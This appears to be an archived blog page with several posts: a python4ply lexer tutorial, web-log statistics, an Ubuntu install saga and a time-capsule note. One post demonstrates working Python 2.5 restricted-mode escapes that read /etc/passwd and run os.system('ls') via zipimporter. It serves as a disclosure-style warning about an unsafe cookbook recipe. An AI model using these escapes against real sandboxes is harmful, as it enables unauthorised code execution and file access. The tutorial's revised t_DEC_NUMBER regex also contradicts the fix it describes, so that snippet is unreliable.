If you think this sounds like a great idea, you're probably wrong. Down this path lies madness. Making a new language isn't just a matter of adding a new feature. The parts go together in subtle ways, and if you tweak the language and someone else tweaks the language a different way, then you quickly stop being able to talk to each other.

Lisp programmers are probably thinking now that this is just a half-formed macro system for Python. They are right. Once you have an AST you can manipulate it in all sorts of ways. But many experienced Lisp programmers will caution against the siren call of macros. Don't make a new language unless you know what dangerous waters you can get into.

On the other hand, it's a lot fun. Someone has to make the new cool langauge for the future so you've got to practice somewhere. And there are a few times when changing things at the AST or code generation levels might make good sense.

Steve Yegge is right when he wrote "When you write a compiler, you lose your innocence."

Getting started

I'll start with the simple thing, to make sure everything works. Create the file "owe_me.py" with the following:

# owe_me.py
amount = 10000000
print "You owe me", amount, "dollars"
To bytecompile it use the provided "compile.py" file. This is similar to "py_compile.py" from the standard library.
% python compile.py owe_me.py
Compiling 'owe_me.py'
% ls -l owe_me.pyc 
-rw-r--r--   1 dalke  staff  165 Feb 17 19:21 owe_me.pyc
%
Running this is a bit tricky because the .pyc file is only used when the file is imported as a module. The easiest way around that is to import the module via a comment-line call.
% python -c 'import owe_me'
You owe me 10000000 dollars
%
(I thought it would be best to use the '-m' option but that seems to import the .py file before the .pyc file. Hmm, I should check into that some more.)

If you want to prove that it's using the .pyc generated by this "compile.py", try renaming the file

% rm owe_me.pyc
% python compile.py owe_me.py
Compiling 'owe_me.py'
% mv owe_me.pyc you_owe_me.pyc
% python -c 'import you_owe_me'
You owe me 10000000 dollars
%
The compile module also supports a '-e' mode, which executes the file after byte compiling it, instead of saving the byte compiled form to a file.
% python compile.py -e owe_me.py
You owe me 10000000 dollars
%

Numbers like 1_000_000 - changing the lexer

Reading "10000000" is tricky, at least for humans. Is that 1 million or 10 million? You might be envious of Perl, which supports using "_" as a separator in a number

% perl
$amount = 10_000_000;
print "You owe me $amount\n";
^D
You owe me 10000000
%

You can change the python4ply grammar to support that. The tokenization pattern for base-10 numbers is in python_lex.py in the function "t_DEC_NUMBER":

def t_DEC_NUMBER(t):
    r'[1-9][0-9]*[lL]?'
    t.type = "NUMBER"
    value = t.value
    if value[-1] in "lL":
        value = value[:-1]
        f = long
    else:
        f = int
    t.value = (f(value, 10), t.value)
    return t

Why do I return the 2-tuple of (integer value, original string) in t.value? The python_yacc.py code contains commented out code where I'm experimenting with keeping track of the start and end character positions for each token and expression. PLY by default only tracks the start position, so I use the string length to get the end position. I'm also theorizing that it will prove useful for those doing round-trip conversions and want to keep the number in its original presentation.

Okay, so change the pattern to allow "_" as a character after the first digit, like this:

    r'[1-9][0-9_]*[lL]?'
then modify the action to remove the underscore character. The new definition is:
def t_DEC_NUMBER(t):
    r"[1-9][0-9]*[lL]?"
    t.type = "NUMBER"
    value = t.value.replace("_", "")
    if value[-1] in "lL":
        value = value[:-1]
        f = long
    else:
        f = int
    t.value = (f(value, 10), t.value)
    return t

To see if it worked I changed owe_me.py to use underscores, and I changed the value to prove that I'm using the new file instead of some copy of the old

# owe_me.py
amount = 20_000_000
print "You owe me", amount, "dollars"
% python compile.py -e owe_me.py
You owe me 20000000 dollars
%

Questions or comments?



python4ply #

python4ply 1.0

python4ply is a Python parser for the Python language. The grammar definition uses PLY, a parser system for Python modelled on yacc/lex. The parser rules use the "compiler" module from the standard library to build a Python AST and to generate byte code for .pyc file.

You might use python4ply to experiment with variations in the Python language. The PLY-based lexer and parser are much easier to change than the C implementation Python itself uses or even the ones written in Python which are part of the standard library. This tutorial walks through examples of how to make changes in different levels of the system

To give you an idea of what it can do, here are some examples from the tutorial:

     # integers with optional underscores separators 
amount = 20_000_000
print "You owe me", amount, "dollars"
      # sytax-level support for decimals
% cat div.py
# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
% python compile.py -e div.py
float 0.1
decimal 0.0
% 
      # Perl-like regex creation and match operator
for line in open("python_yacc.py"):
    if line =~ m/def (?P\w+) *(?P\(.*\)) *:/:
        print repr($1), repr($args)

The primary site for python4ply is http://dalkescientific.com/Python/python4ply.html. The package is released under the MIT license.

Download python4ply-1.0.tar.gz or view the tutorial.

  • Questions or comments?


  • Restricted python #

    Long time ago there was the thought that Python could support a restricted execution mode, where untrusted code could be executed with limited capabilities. Quoting from the Python 2.2.3 manual:

    There exists a class of applications for which this "openness'" is inappropriate. Take Grail: a Web browser that accepts "applets,'' snippets of Python code, from anywhere on the Internet for execution on the local system. This can be used to improve the user interface of forms, for instance. Since the originator of the code is unknown, it is obvious that it cannot be trusted with the full resources of the local machine.

    Restricted execution is the basic framework in Python that allows for the segregation of trusted and untrusted code. It is based on the notion that trusted Python code (a supervisor) can create a ``padded cell' (or environment) with limited permissions, and run the untrusted code within this cell. The untrusted code cannot break out of its cell, and can only interact with sensitive system resources through interfaces defined and managed by the trusted code.

    In practice this didn't work out. By the time 2.3 came out the restricted execution documentation said:
    Warning: In Python 2.3 these modules have been disabled due to various known and not readily fixable security holes. The modules are still documented here to help in reading old code that uses the rexec and Bastion modules.
    There were a lot of tricks to get around the problem. Over time the simple ones were patched but the problem is the Python C implementation (and probably the Java and .Net ones) weren't designed with security in mind. It's very hard to retrofit security.

    Some of the restricted environment code stayed in Python. Here's a snippet from the CVS version just before 2.6a1.

            /* rexec.py can't stop a user from getting the file() constructor --
               all they have to do is get *any* file object f, and then do
               type(f).  Here we prevent them from doing damage with it. */
            if (PyEval_GetRestricted()) {
                    PyErr_SetString(PyExc_IOError,
                    "file() constructor not accessible in restricted mode");
                    f = NULL;
                    goto cleanup;
            }
    
    The PyEval_GetRestricted() test checks to see if __builtins__ for the current frame is the same as Python's globals. If not, it's a restricted environment. Here's an example of the same code run in each environment:
    >>> exec """print [x for x in ().__class__.__bases__[0].__subclasses__()
    ...      if x.__name__ == 'file'][0]('/etc/passwd').read()[:60]"""
    ##
    # User Database
    # 
    # Note that this file is consulted whe
    
    
    >>> L = G = dict(__builtins__ = {})
    >>> exec """print [x for x in ().__class__.__bases__[0].__subclasses__()
    ...      if x.__name__ == 'file'][0]('/etc/passwd').read()[:60]""" in L, G
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "&tl;string>", line 1, in <module>
    IOError: file() constructor not accessible in restricted mode
    >>> 
    

    Today I saw the recently contributed Python Cookbook Recipe which "create[s] a restricted python function from a string." Sounds nice so I looked at it. It basically uses what's left of the old rexec code, which is know to be untrustworthy for the general case.

    For the person who posted the code it's probably good enough, but the recipe doesn't include the strong warnings I thought were needed. I added a comment, and to strengthen the comment decided to come up with an attack using the default recipe and without using any passed in variables.

    I came close. If I know the location of an egg which has already been loaded and which contains a reference to the 'os' module then I can get access to os.system through the zipimporter type. One such common module is 'configobj'.

    # Example attack code using the zipimport type to get around Python's
    # restricted mode checks.
    
    # Must import this otherwise zipimporter will fail because zlib can't
    # be found.  (Reading another zip file fixes that, but then the import
    # fails because it can't find __import__)
    import configobj
    
    
    attack_code = """
    
    all_types = ().__class__.__bases__[0].__subclasses__()
    file = [x for x in all_types if x.__name__ == "file"][0]
    
    # Prove that I'm in restricted mode, or that I'm running
    # on a non-unix-based machine.  This stop is optional
    try:
        file("/dev/zero")
    except:
        pass
    else:
        assert "Was able to open a file!"
        1/0
    
    zipimport = [x for x in all_types if x.__name__ == "zipimporter"][0]
    
    # Easiest case would be on a system with a python*.zip file
    # because I could import os directly this way.
    
    egg = ("/Library/Frameworks/Python.framework/Versions/2.5/lib/"
           "python2.5/site-packages/configobj-4.4.0-py2.5.egg")
    loader = zipimport(egg)
    configobj = loader.load_module("configobj")
    os = configobj.os
    
    print "system call:", os.system("ls")
    
    """
    
    
    L = G = dict(__builtins__ = {})
    exec attack_code in L, G
    
    This contains comments and some code to verify that I'm really running in restricted mode. Take that out and the attack code is an expression that doesn't need to be exec'ed and which doesn't use any passed in variables.
    [x for x in ().__class__.__bases__[0].__subclasses__()
       if x.__name__ == "zipimporter"][0](
         "/Library/Frameworks/Python.framework/Versions/2.5/lib/"
         "python2.5/site-packages/configobj-4.4.0-py2.5.egg").load_module(
         "configobj").os.system("ls")
    

    I considered reporting this as a bug to the Python maintainers, in case there was thought to slowly patch problems like this, but then noticed Python 3's "NEWS" file says

    - Remove the f_restricted attribute from frames. This naturally leads to the removal of PyEval_GetRestricted() and PyFrame_IsRestricted().
    Goodbye and good riddance. It won't confuse people into thinking it does something useful when it doesn't.



    Log analysis of my website #

    I write these essays in part as a promotional activity. I'm a consultant, and expect people to find out more about what I do through reading what I've written.

    I've wondered if it's been useful, but have put off doing the analysis of my website. At first it was because I didn't have enough essays to do interpretable analysis. And then I just put it off. At the German Chemoinformatics Conference I talked to quite a few people, mostly grad students, who had gotten information from my site. That was enough to make me finally do some analysis.

    I used awstats, chosen based on doing some web searches. I wanted something that could analyze my Apache logs and could generate static pages. There are other tools but since awstats did what I wanted I didn't try anything else.

    So far this year I've had 1.1 million "hits", which corresponds to 330,000 page views. A "hit" includes images, so a page view can have multiple hits because of CSS, images, and other embedded content. Another nearly 500,000 page views comes from web spiders and other identifiably non-people requests. More page requests from robots than people. All told, I use less than 20GB bandwidth per year. I use pair Networks for my hosting. My basic account allows 400GB/month of transfer. I'm not even close.

    Of the robots, Yahoo Slurp pulled down 1.6 GB, MSNBot 810 MB and and Googlebot 290MB. 80MB for Google's RSS reader, 7MB from Bloglines and 5MB from UniversalFeedParser. Of the users, 64.5% use Windows, 17% use Linux, 11.5% use Macs, and jumping over the BSD and Solaris users, a full 88 requests came from an IRIX machine. The browser stats are 45% Firefox, 33.5% IE, 4% each Mozilla and Firefox, 3% Opera.

    Top hit (no surprise) is my RSS feed, viewed 82,000 times this year. Including by aggregators so translate as you wish. Next was my LOLPython page, which wasn't a surprise. I wrote it deliberately because of the then high popularity of lolcats and lolcode. It got 17,500 views. About 1,200 downloads from people who weren't me.

    The next two were surprising. I did a series of lectures for the NBN. These were for the most part graduate students in biology, going into computational biology, who needed more programming training. The page on Javascript validation got 7,300 hits and on threads in Python, with 5,800. My screen scraping was also popular, at 5,600 views.

    Going further down the list:

    I do a lot of work with cheminformatics, but that's the details. In most cases my topic is more general, like how to write a C extension for Python (that just happens to use a chemistry toolkit). The highest cheminformatics specific hit is my article on SMILES tokenization, with 1,500 hits. Most of the links come from Wikipedia's SMILES page. My most popular bioinformatics page is on BLAST parsing at just under 1,400 hits.

    You can easily see that most people who come to my pages are there because of popular topics of the day (LOLPython, wide-finder) or general computing questions (threading, validation, HTML templates, Python, ANTLR). Very few came to my pages for cheminfomatics reasons. Then again, there are very few people doing cheminformatics.

    The top search phrases were:

    Yes folks, 2,000 people came to my site for one image I have of a use case, from a 10 minute presentation I gave at a bioinformatics conference trying to convince people that usability analysis is important. I don't think it had any effect. No one came to my site searching for information on OEChem.

    60% of the pages come from "direct address or bookmarks". 31% came from search engines, and 10% from referrers. The top being lolcode.com, then Pythonware's Daily-URL (probably lolpython), with the already mentioned wide-finder (via the effbot) and ANTLR home page. programming.reddit.com linked to my lolpython page, and the matplotlib cookbook links to my page showing how to use matplotlib without a GUI.

    Lastly, hostname analysis. Who is 207.172.151.225? That's registered to the RCN Corporation and resolved at 207-172-151-225.c3-0.gth-ubr1.lnh-gth.md.cable.rcn.com. They sucked down 780 MB of my 20GB. All to read my RSS file every hour. Whoever it is doesn't know to how to ask for an If-Modified-Since as they are downloading the entire thing (usually unchanged) every time. How do I complain?

    The next hog is NewsAlloy through 207.230.13.10 which has downloaded 450 MB, and makes full requests every 20 minutes. I emailed them this:

    Your RSS reader at 207.230.13.10 , identified as "NewsAlloy/1.1 (http://www.NewsAlloy.com; 1 subscribers)" is taking up 5% of my upload bandwidth. While that's only 400MB/year, the underlying reason is because your service doesn't send the tags needed to handle HTTP conditional get. My server should only need to return a 304 Not Modified for most cases, rather than the 200 Ok (along with over 100K of content). You poll every 20 minutes, so that adds up.

    You would decrease your bandwidth use by quite a bit - perhaps an order of magnitude - by adding support for conditional GET requests. See for example: http://fishbowl.pastiche.org/2002/10/21/http_conditional_get_for_rss_hackers .
    I admit: I do this partially to see what happens. I got an answer within a few hours. They said it shouldn't have happened and asked for more details. Looking into it further I see that whever subscribed via their service unsubscribed a few months ago. NewsAlloy hadn't made a request since then.

    I don't know who uses NewsAlloy. I will say that they had very responsive service.

    Next on the list, at only 6MB is my ISP. This is me checking things on my server, and my home page is my web site. After that is a friend (I recognized the domain name) at 4MB. He's configured his RSS reader to poll every 30 minutes.

    Looking for hosts in my field, I see 2,000 requests hits from a biotech in England. Ah-ha, it's one person, reading this from a machine with "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)". Hi!

    There are 700 page requests from the rest of pharma. 200 from one site (all through Google searches finding my PyDaylight work) and 100 from another site.



    Installing Linux #

    Forenote: Glyph wrote me wondering how I managed to get things so messed up. He wrote

    First, let me tell you how this whole mess is _supposed_ to go. You put in the install disk, it brings up a nice graphical display. It asks you for your target disk - which the installer *does* see. You can then use the full OS (pidgin, gimp, emacs, python, whatever you like) while the installation takes place in the background. There's a menu, which looks like a cell phone "bars" icon, and works more or less like the Airport menu, for setting up wireless. You definitely shouldn't have to type "dhclient3" on the command-line! I've probably installed ubuntu 30 times over the past 2 years, and modulo a few minor problems with nvidia cards giving me distorted resolutions, it has always worked that way.
    I have no idea about the hard drive issue, but it sounds like your post- installation woes were likely caused by using the "server" installation CD instead of the "desktop" one.
    Thinking backwards, that's almost certainly what happened. When I went to the Ubuntu page there was the option of "desktop" or "server" options. I wanted to install servers like Apache and MySQL. I figured a desktop machine is for people who want a web browser and some applications, while I wanted gcc, the unix command-line tools, etc. that I would use when developing servers. Plus, it says that the LTS server version gets a longer support - 5 years instead of 3 for the desktop. (I did not get the LTS version; I'm explaining how I decided to choose 'server' over 'desktop'.) I figured that was the case because the end-user applications change more frequently than the relatively stable development software.

    Nothing on the Ubuntu page described the difference between desktop and server. That's changed. If you look at the page now you'll see that the "desktop" option shows a picture of a laptop, the "server" option shows some rack mounted machines, and there's links for each saying "learn more". This changed about 10 minutes ago because when I started writing this update it still had the old layout. Looking back through archive.org's history, it seems the lack of a "learn more" was an anomaly. Eg, you can see it exists in the snapshots from: 12 June 2007 and 10 Jan 2007. Archive.org lists nothing for since June and now. A-ha! At least for now you can see what used to be on the front page here, or here's a screenshot to show I wasn't being completely an ignoramus:

    Grrrrrrrrr......!


    Pipeline Pilot is a visual dataflow system with a domain focus in computational chemistry. Because of it's very strong marketing background and good technology, it's made a big noise on the small domain I work in. I happen to dislike dataflow systems and think its popularity is a measure of how generally unusable (in the HCI sense) chemistry software is. And again, marketing works.

    Pipeline Pilot is a big scary monster to some of the other vendors. As a result, Knime, which is a dual-licensed free/commercial package from a university group, also with a chemistry focus, is itself getting some attention. A few people have asked me if I've looked at it, and I haven't. But I'm a consultant and perhaps it's something I should know about so people will give me money.

    Which reminds me, I do more than consult for computational chemistry, so if you're looking for an experienced Python developer based in Göteborg, Sweden, email me. (After the fact: but obviously don't hire me as a system administrator :)

    My primary machine is a Mac. I used to have a Thinkpad 600E (or some number like that) which worked out pretty well. I upgraded to a T23 but ended up with lots of programs getting Linux installed on it. My girlfriend at the time, a big Mac fan, helped convince me to get a Mac. I've not looked back sense.

    Sometimes I need to go back. There is after all software that doesn't run on a Mac. One is Knime. It's written Java but there's some conflict between the AWT and the Eclipse SWT that means it doesn't work on my machine. When I visited friends in the US over Thanksgiving I pulled out my old T23 which I had stored in their garage. Perhaps I could use that to run the Linux version.

    I tried to boot it but it didn't find the hard disk. Strange. Wonder if the disk went bad. I took it with my back from the US and since bad contacts are an easy problem to fix I did the first trick of pulling things apart and putting it back together again. Nope. Didn't work.

    I made a install disk for Ubuntu Linux (Fiesty) to see what that would tell me. Went through the first few screens but couldn't find a disk. To be correct, it couldn't figure out which driver to use for the disk. My translation: disk is bad or hardware to the disk is bad. I figured the first case was more likely and went looking for a replacement. First step was to a local computer repair shop. He said (in Swedish as his English wasn't good), "yes, the disk is bad."

    I went to a computer store on Hisingen (that's the island immediately across from downtown) and asked about getting a new hard disk. They didn't have any in stock that would work and suggested I go to another computer store somewhat nearby. He showed me where on the map but I had never been there, it wasn't easy to go to without a car, and it was about 5pm so the sun had set 1.5 hours earlier and I didn't want to hunt around in the darkness. I went home and looked up the place on the map so I could orient myself better.

    It was also on Hisingen, but the bus that way goes only every 30 minutes so it was about a 15-20 minute walk from the Frihamn stop. Got there. It reminded me of a NAPA auto parts place, or of the really good hardware stores. The ones where you go to the desk and say "I want a 8-inch left-handed variable-speed smoke-shifter" and they'll get it for you from the stock room. They had a replacement drive, in 80 GB (the old was 50).

    While I was there I opened the bag, plugged in the machine and ... no go. The machine still didn't see the disk. So it looks like I just wasted money for nothing. I checked - no return policy for this, even though I hadn't even left the store. I then checked with the repairs people, but they don't repair laptops, only desktops. They did give me the name of a place to go to, but I'm thinking the price is getting too much for exploratory research.

    Subscribing to the sunken cost fallacy, can I spend some more money so the money I spent didn't go to waste? Well, I can buy an IDE enclosure so I can get my Mac to connect to the new drive over USB. Plus, the T23 might be see a USB drive. I bought it.

    Started working on that today. (This is now day 3 of the attempt to install Knime.) Whaddaya know, the Ubuntu installer sees the USB disk and I can install onto it. And boot. It's dog slow because everything's going over USB2 and not the IDE bus, but usable. Problem is, there's only a console. I don't have a GUI and can't figure out how to get the wireless working so I can connect to my local base station.

    Strange thing is that I can only get a console interface. Where's X? When I installed there were a bunch of red lines in the output when it tried to connect over the network. Because wireless wasn't working, I had told it I would configure the network later. Perhaps had I had the network going it would have worked better? Or are all Ubuntu installs like this?

    How do I install X? "xinit"? Nope. Though the error message gives me something about using apt to install a package. Tried that out. Red lines. Try "apt" and the various apt-programs. Figured out how to tell it to look at the CD-ROM for files. (Or it knew it already.) Messed around some, got some X client apps installed, but no X server. Do I need to connect to the network for the rest of this?

    Finally gave up, unplugged my Airport Express (I have no router so can only plug one Ethernet cable in.) Nothing. Power-cycled the DSL modem. ifconfig says I've got some network traffic on eth0, but no DHCP. How do you tell Ubuntu/Linux to enable dhcp? Does the network even work? The install disk lets me configure for DHCP so rebooted with that. Yippee! It sees the network, and I can ssh out. But how do make that work with my install. Should I just reinstall from scratch given that I can see the network now? In retrospect I think the answer is "yes".

    There's a program called "dhclient3". Wonder what that does. Run it. Interesting. Looks like .. yes .. I've got a DHCP connection. My "nslookup www" fails instead of timing out. I can see the outside world.

    Worked with "apt" some more and figured out how to get the X server running. "startx" to get into it - and it exists. No window manager found. What does Ubuntu use? Gnome, right? Used apt to install various Gnome parts. Now I can get a system working .. but there's no window manager. I had installed metacity. How do I start it? Where's the terminal? Can't find that, but was able to make a desktop item that starts "/bin/bash" in a terminal. Only to get the message that gnome-terminal wasn't installed.

    At this point I'm in the GUI, "Synaptic Packager Manager" and I install gnome-terminal. That's enough to get a window open where I can type "metacity". Terminal, web browser, and the ability to swap between windows. What more does anyone need?

    For one, a slew of missing programs. A lot of Unix system utilities are missing. Go through Synaptic and toggle the ones that look important. There's an icon by some of them which I think means "part of the normal Ubuntu install". I clicked on that column so I would see them grouped together. After 5 minutes of near 100% CPU use I killed it and started again.

    Toggled on the ones that I thought were useful, and chose ones like OpenOffice that have a lot of dependencies. Install. Time to go out salsa dancing. Came back.

    In various bits of playing around I found the Network Manager and enabled eth0. Tried to enable my wireless but I've forgotten the password. I think I'll just reset it and let it be open. I still haven't figure out how to get Metacity as the initial window manager. And I installed yet more programs. I tried "wicd" as a perhaps easier way to deal with my wireless. It's got a tray control that might be something like what my Mac has. It worked enough to tell me the wireless was working, but then it failed, miserably, with a Python traceback saying it tried to send a Unicode string over DBUS. (Note to self; you've also said you're going to look into DBUS.) I couldn't get it working again.

    In the meanwhile I downloaded Knime. All 170MB or so for the developer's version. This includes code from Eclipse, but it's huge. There's no reason such a program should take so much space, I think. Why, "when I was a kid I had ...." I remember Craig and I being astonished in 1990 when we took an operating system's course and found out that SunOS's kernel was over 1MB. On the other hand, it doesn't take all that long to download. I've got a 2MBit/sec connection here, for the same price as my old sub-1MBit/sec in Santa Fe.

    I should reboot. In addition to getting the network (hopefully) working, I also installed a libc security update. I wonder if I'll get a GUI login. ... Or if it will boot. .... Well, that took a while. Text prompt, then startx, then .. oops, to the terminal to start metacity. Cool, the DNS is working. Go back to the package manager. A-ha! There's a "ubuntu-desktop" option (and a few others) which are virtual packages that load all of the dependencies. Looks like I'm missing a lot of files. *sigh*

    While that's happening I did get Eclipse/Knime started. The first line in the README is .. "update the Knime installation."

    Why am I writing this now? I'll skip the obvious Mac vs. Linux comparisons. The Ubuntu people are working on a really hard problem that Mac doesn't have because Apple controls the platform. A question is, should I be proud happy, excited or otherwise joyous that I managed to get all of this working? It was a lot to figure out on my own and there's many who wouldn't have gotten it, or would have given up, or would have (as I should have), just reinstalled and seen if that improved things.

    In looking up some of the network problems I found several which had step-by-step walkthroughs of the installation process, and even one which had a video clip of a guy talking about the installation and suggestions for what to install afterwards. That's where I got the pointer to wicd. Yet it feels like the same problem I have when I buy a new computer. The field changes so much and I don't pay enough attention to it so that the knowledge gained doesn't really help for the next time.

    There are people who like tracking hardware and OS information. I'm more at the application level, and do that myself with APIs and libraries and web interfaces. Which means I feel these last three days was almost a complete waste. I like being able to ignore things I don't care about. Linux feel more written for those who care about things I don't.

    I hope the Knime investigation is worth it. There are a couple of other things I'm thinking to do with an extra Linux machine, so this isn't the only reason, just the driving one. But perhaps serendipity will strike with the others.

    P.S. It's now the next day from when I wrote that. Everything's downloaded, installed (except some acp things that Synaptic said didn't install correctly and were removed; and Eclipse demanded interaction when looking for a mirror when I wanted to let it go overnight while I slept so I had to finish that off this morning) and working. I haven't yet checked to see if get a graphical login after reboot, or working window manager. What I've got is good enough. I'll say it again - working from a USB2-based drive is mind numbingly slow.



    Time capsule #

    Came across this link on BoingBoing about a film about the 1939 World's Fair. It's The Middleton Family at the New York World's Fair" and available through archive.org. I watched some of it. Can't say it was worthwhile.

    One of the things it mentioned was the time capsule buried then, to be opened in 5,000 years. The term time capsule was invented specifically for it, though the practice is older. How will the people of the year 6939 know about the time capsule? One way was to publish a book, with copies sent to libraries and archives around the world, titled The Book of Record of The Time Capsule. On acid free paper that should last a long time, with copies distributed widely, in the hopes that in the deep future someone will come across it and think to find and open the capsule.

    I read part of the book. It's in the somewhat florid style of the time, which I think gets its influence from oratory.

    By A.D. 6939, it is probable, all present-day landmarks, city surveys, and other such aids for locating such an object will have disappeared. The spot may still be discovered, however, by determination of the latitude and longitude. The exact geodetic coordinates [North American Datum of 1927J are :
        Latitude 40° 44' 34". 089 north of the Equator 
        Longitude 73° 50' 43".842 west of Greenwich
    

    I'm writing this only 68 years in the future. There are people still alive who were at that fair. I could find the capsule's location in many ways, but I decided to use the lat/long. Using Google maps I see it's in Flushing Meadows Park, which is also where other sources say it is. But it's very close to some limited access roads and doesn't appear to be anything at the spot.

    We no longer use the North American Datum of 1927. I converted from NAD27 to NAD83 to get 40° 44' 34.45671" N by 73° 50' 42.32593" W, which is a shift of 37.289 meters. Bingo! Arrow marks the spot.



    Copyright © 2001-2008 Dalke Scientific Software, LLC.